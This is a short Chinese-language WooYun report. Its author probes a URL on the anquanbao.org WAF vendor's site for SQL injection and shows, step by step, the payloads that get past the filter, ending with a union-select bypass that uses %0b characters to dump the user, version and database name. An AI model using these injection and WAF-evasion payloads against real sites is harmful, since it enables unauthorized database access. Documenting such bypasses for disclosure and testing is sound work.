WooYun.org

今天一个朋友给我发一个连接，http://secaqb.anquanbao.org/sqlin.php?id=9 问我有没有注入，闲着无聊就试试，
http://secaqb.anquanbao.org/sqlin.php?id=9'

简单看一下，额这是什么东西 没有见过呀，朋友说是waf,好高端的样子，百度waf
http://zhidao.baidu.com/question/437176497.html 原来这个是waf,那就是说web前面多了牛叉的东西防止注入了吧。继续搞不信这么安全。
php的 应该是mysql吧，试试
http://secaqb.anquanbao.org/sqlin.php?id=9 or 1=1
额 还不行 又出来拦截了。
http://secaqb.anquanbao.org/sqlin.php?id=9 or 1>1
额 考虑的挺全呀，这个也考虑了呀
http://secaqb.anquanbao.org/sqlin.php?id=9 or(1)in(1)
额 这个不拦了 结果是正确的

http://secaqb.anquanbao.org/sqlin.php?id=-9%20or(-1)in(1)
在试一下这个

没有结果确实是一个注入点。
给朋友反馈说是注入，没想到这家伙贪得无厌，还让我查数据，说这个不过瘾。
那就继续吧，union select才能查询数据吧 那就试试。
http://secaqb.anquanbao.org/sqlin.php?id=-9%20union
不拦 可以用union
http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%20select
大喜 这个也不拦
悲剧刚刚开始，在select后面添加字符就拦了 不知道怎么搞了，想来想去，这是怎么回事呢
朋友说，这个是因为它使用正则进行匹配了，遇到union select就可能给拦截了 正则大概就是
union\sselect,正则就是希望呀，正则是精确匹配，稍微有点不同就完蛋了。哈哈，上特殊字符直接就绕过正则了，经测试终于搞定了，构造语句如下:
http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect%0b1,user(),version(),database()

就这样了没有什么意思，发给朋友交差了。
后话:后来得知这个是安全宝的防护设备，因此上来偏点rank 想弄本书，希望能得逞。